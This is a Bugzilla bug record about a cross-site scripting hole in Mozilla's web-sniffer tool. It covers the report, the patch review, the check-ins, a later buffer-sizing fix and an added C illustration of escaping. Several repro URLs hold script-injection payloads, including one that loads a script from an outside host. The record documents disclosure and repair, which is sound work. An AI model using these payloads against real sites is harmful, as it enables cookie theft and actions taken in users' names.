Closed Bug 57556 Opened 24 years ago Closed 20 years ago

web-sniffer displays "url" param without escaping

Categories

(Webtools Graveyard :: Web Sniffer, defect, P3)

Other
Other

Tracking

(Not tracked)

RESOLVED FIXED
Future

People

(Reporter: jruderman, Assigned: erik)

References

()

Details

(Whiteboard: security)

Attachments

(1 file, 1 obsolete file)

The web-sniffer webtool displays the "url" param without escaping it, so an attacker could make "me" do things on http://webtools.mozilla.org/ that I wouldn't do myself, or steal my cookie for mozilla.org or webtools.mozilla.org. I don't know what else is on webtools.mozilla.org, so I don't know if this is a major problem for the mozilla.org installation, but other people might set up the web-sniffer tool at a hostname that uses cookies on some or all pages, or that depends on the HTTP referer for making sure a change is really coming from the user.
It also doesn't quote or escape the current url when it encounters usemap=#anchor (I didn't test a href=#anchor).

http://webtools.mozilla.org/web-sniffer/view.cgi?url=http%3A%2F%2Fhome.crosswinds.net%2Fnotfound.php%3Fnf%3D%2F%7Ejedinicht%2FAnakin.zip%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

The sniffer output for that page contains:

<font color=#3333FF>0</font> <font color=#009900> </font> <font color=#FF6600>usemap</font> <font color=#009900>="</font> <a href=view.cgi?url=http://home.crosswinds.net/notfound.php?nf=/~jedinicht/Anakin.zip"><script>alert(1)</script>#lshop><font color=#3333FF>#lshop</font></a><font color=#009900>"&gt;</font><font color=#FF0000>LF</font>
Erik owns the web sniffer.
Assignee: tara → erik
Component: Bugzilla → Web Sniffer
erik is leaving. Mark it as Future.
Target Milestone: --- → Future
erik resigned. Reassign all his bugs to ftang for now.
Assignee: erik → ftang
Mark all Future/NEW bugs as ASSIGNED after the move from erik to ftang.
Status: NEW → ASSIGNED
Reassign to Dawn to evaluate whether mozilla.org wants to keep hosting this tool in its broken state. I don't see that mozilla.org has set any cookies, but I don't know what other tools might run on webtools.mozilla.org and have cookies worth stealing. There's also the remote possibility of a targeted attack against staff@mozilla.org who might have access to content on *.mozilla.org that is not normally accessible, but which the attacker knew existed. With the document.domain bug fixed, attacks would be restricted to webtools.mozilla.org, so there's even less potential damage.

security@mozilla.org received the following today:

> Received: from thor2k [212.112.131.133] by jscript.dk with ESMTP
> (SMTPD32-6.06) id A2BC9C5500B2; Wed, 04 Sep 2002 11:30:36 +0200
> Message-ID: <00ad01c253f5$f74851c0$858370d4@thor2k>
> From: "Thor Larholm" <thor@pivx.com>
> To: <secure@mozilla.org>
> Subject: Fw: [css-d] css problem with netsacpe 7
> Date: Wed, 4 Sep 2002 11:32:19 +0200
> MIME-Version: 1.0
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
>
> Hi,
>
> Mozilla.org has a small XSS hole in its web-sniffer.
>
> Example:
> http://webtools.mozilla.org/web-sniffer/view.cgi?url=<script%20src=http://jscript.dk/test.js></script>&verbose=on
>
> What is XSS:
> http://www.cert.org/advisories/CA-2000-02.html
> http://www.cgisecurity.com/articles/xss-faq.txt
>
>
> Regards
> Thor Larholm, Security Researcher
> PivX Solutions, LLC
>
> Are You Secure?
> http://www.PivX.com
Assignee: ftang → endico
Status: ASSIGNED → NEW
Comment on attachment 99104 [details] [diff] [review] patch v1: patch that fixes problem

The new toHTML appears to throw away the escaped string.
Attachment #99104 - Flags: needs-work+
I've spent some time staring at this, and I'm having problems reproducing the bug, and it's not clear to me why. Can you ping me tomorrow and help figure this out?
Try these URLs to reproduce the problem and its solution:

http://webtools.mozilla.org/web-sniffer/view.cgi?url=%3Cscript%3Ealert('foo!');%3C/script%3E&verbose=on
http://webtools.mozilla.org/web-sniffer/stage/view.cgi?url=%3Cscript%3Ealert('foo!');%3C/script%3E&verbose=on

The first URL should display an alert dialog (demonstrating arbitrary JavaScript running from the mozilla.org domain), while the latter demonstrates the fix (escaping the JavaScript so it appears as text in the page instead of executing). If you don't get an alert dialog when you load the first URL, make sure you have pop-up blocking disabled, since that feature blocks alerts as well in recent nightlies (bug 167559).
Comment on attachment 99160 [details] [diff] [review] patch v2: doesn't throw away escaped_str

r=dmose
Attachment #99160 - Flags: review+
Checking in cgiview.c;
/cvsroot/mozilla/webtools/web-sniffer/cgiview.c,v  <--  cgiview.c
new revision: 1.3; previous revision: 1.2
done
Checking in html.c;
/cvsroot/mozilla/webtools/web-sniffer/html.c,v  <--  html.c
new revision: 1.3; previous revision: 1.2
done
Checking in html.h;
/cvsroot/mozilla/webtools/web-sniffer/html.h,v  <--  html.h
new revision: 1.2; previous revision: 1.1
done
Checking in net.c;
/cvsroot/mozilla/webtools/web-sniffer/net.c,v  <--  net.c
new revision: 1.3; previous revision: 1.2
done
Checking in view.c;
/cvsroot/mozilla/webtools/web-sniffer/view.c,v  <--  view.c
new revision: 1.2; previous revision: 1.1
done

gcc -Wall -pedantic -D_REENTRANT -O -c -o addurl.o addurl.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o file.o file.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o hash.o hash.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o html.o html.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o http.o http.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o io.o io.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o mime.o mime.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o net.o net.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o url.o url.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o utils.o utils.c
gcc -Wall -pedantic -D_REENTRANT -O -c -o view.o view.c
gcc -Wall -pedantic -D_REENTRANT -O cgiview.c addurl.o file.o hash.o html.o http.o io.o mime.o net.o url.o utils.o view.o -lsocket -lnsl -o view.cgi
Status: NEW → RESOLVED
Closed: 22 years ago
Resolution: --- → FIXED
Thor, thanks for re-reporting this bug, and Myk, thanks for fixing it.
myk: you introduced lines which didn't contain tabs into files which were purely tab based.
Status: RESOLVED → VERIFIED
Whiteboard: security
Thanks to all for working on this bug, but there was a problem with the fix. In non-verbose mode, the viewer shows horizontal lines and status messages that should only appear in verbose mode. Reopening.
Status: VERIFIED → REOPENED
Resolution: FIXED → ---
Assignee: endico → erik
Status: REOPENED → NEW
The valgrind tool found another problem:

    result = calloc(strlen((char *) escaped_str)+2, 1);

Should be "+3" for the 2 double-quotes and the null terminator.
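The two defects discussed in this bug, unescaped output of the "url" parameter (the repro in the earlier comment) and the undersized calloc for the quoted string (the valgrind finding above), both come down to one routine: escape the attacker-controlled value, then wrap it in quotes with a buffer that has room for the two quotes and the terminator. The C below is an added illustration written for this page, not web-sniffer's own html.c or cgiview.c; the function names html_escape, quote_escaped and render_url_param, the entity table, and the sample payload are all assumptions chosen to mirror the bug's description.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Entity for c, or NULL when c is safe to emit as-is. Assumed table:
   the five characters that can break out of text or a quoted attribute. */
static const char *html_entity(unsigned char c)
{
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Escape s for insertion into an HTML text node or a double-quoted
   attribute. Two passes: measure, then copy. Caller frees the result. */
char *html_escape(const char *s)
{
    const unsigned char *p;
    size_t len = 0;
    for (p = (const unsigned char *)s; *p; p++) {
        const char *e = html_entity(*p);
        len += e ? strlen(e) : 1;
    }
    char *out = malloc(len + 1);          /* +1 for the NUL terminator */
    if (!out)
        return NULL;
    char *q = out;
    for (p = (const unsigned char *)s; *p; p++) {
        const char *e = html_entity(*p);
        if (e) {
            size_t n = strlen(e);
            memcpy(q, e, n);
            q += n;
        } else {
            *q++ = (char)*p;
        }
    }
    *q = '\0';
    return out;
}

/* Wrap an already-escaped string in double quotes. The buffer needs
   strlen + 3 bytes: two quotes plus the NUL. Allocating strlen + 2, as the
   first fix did, puts the terminator one byte past the allocation, which is
   exactly the off-by-one valgrind reported. */
char *quote_escaped(const char *escaped_str)
{
    size_t n = strlen(escaped_str);
    char *result = calloc(n + 3, 1);
    if (!result)
        return NULL;
    result[0] = '"';
    memcpy(result + 1, escaped_str, n);
    result[n + 1] = '"';
    /* result[n + 2] is already '\0' from calloc */
    return result;
}

/* Render the decoded "url" CGI parameter the way a fixed viewer should:
   escaped and quoted, so script markup in it shows up as text. */
char *render_url_param(const char *url_param)
{
    char *esc = html_escape(url_param);
    if (!esc)
        return NULL;
    char *quoted = quote_escaped(esc);
    free(esc);
    return quoted;
}

int main(void)
{
    /* Constructed sample: the repro payload after CGI percent-decoding. */
    const char *payload = "<script>alert('foo!');</script>";
    char *rendered = render_url_param(payload);
    if (!rendered)
        return 1;
    printf("unescaped (vulnerable): url=\"%s\"\n", payload);
    printf("escaped   (fixed):      url=%s\n", rendered);
    free(rendered);
    return 0;
}
```

Running it prints the payload once as the browser would have parsed it (a live script tag) and once as inert text; the quoted form is always exactly two bytes longer than the escaped string, which is the invariant the "+3" allocation preserves.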
Fixed both problems. See Bonsai for file version details.
Status: NEW → RESOLVED
Closed: 22 years ago → 20 years ago
Resolution: --- → FIXED
QA Contact: mattyt-bugzilla → web.sniffer
Product: Webtools → Webtools Graveyard